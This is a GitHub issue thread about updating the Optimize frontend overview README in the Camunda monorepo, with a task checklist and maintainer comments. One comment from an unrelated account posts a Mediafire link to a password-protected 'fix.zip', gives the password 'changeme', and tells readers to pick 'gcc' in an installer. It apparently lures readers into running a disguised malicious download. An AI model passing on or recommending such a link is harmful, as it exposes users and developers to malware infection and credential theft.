### ISSUE TITLE
Update `FRONTEND_OVERVIWE.md` file

### ISSUE THREAD

**Issue by misiekhardcore** [camunda/camunda#21745]
Engineering DRI: @misiekhardcore 

### Context

After merging the C7 `Master_feature_branch_during_codefreeze` branch from `camunda/camunda-optimize` into `camunda/camunda` we need to update the `FRONTEND_OVERVIWE.md` (and other readmes if needed) to reflect how the Optimize frontend works in the monorepo

### Acceptance Criteria

- [x] `FRONTEND_OVERVIWE.md` is updated
- [x] any other optimize client README files are updated

### Breakdown

```[tasklist]
### Pull Requests
- [ ] https://github.com/camunda/camunda/pull/22442
- [ ] https://github.com/camunda/camunda-optimize/pull/14280
```

## Task Lifecycle

For managing the issue lifecycle, please use the workflow commands. You can see the available
commands by writing `/help` as a comment on this issue.

#### Engineering Review

- [ ] All code targeting the main branch has been reviewed by at least one Engineer
- [ ] The PR targeting the main branch has been approved by the reviewing Engineer
- [ ] If the API has changed, the API documentation is updated
- [ ] All other PRs (docs, controller etc.) in the breakdown have been approved

#### QA Review

- [ ] The change is implemented as described on all target environments/versions/modes
- [ ] The documentation changes are as expected

### Completion

- [x] All Review stages are successfully completed
- [x] All associated PRs are merged to the main branch(es) and stable branches
- [x] The correct version labels are applied to the issue

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by misiekhardcore** [comment]
@OmranAbazid should do this updates to the `camunda/camunda-optimize` files as well?

**Comment by misiekhardcore** [comment]
I think QA is not needed here. I close this issue
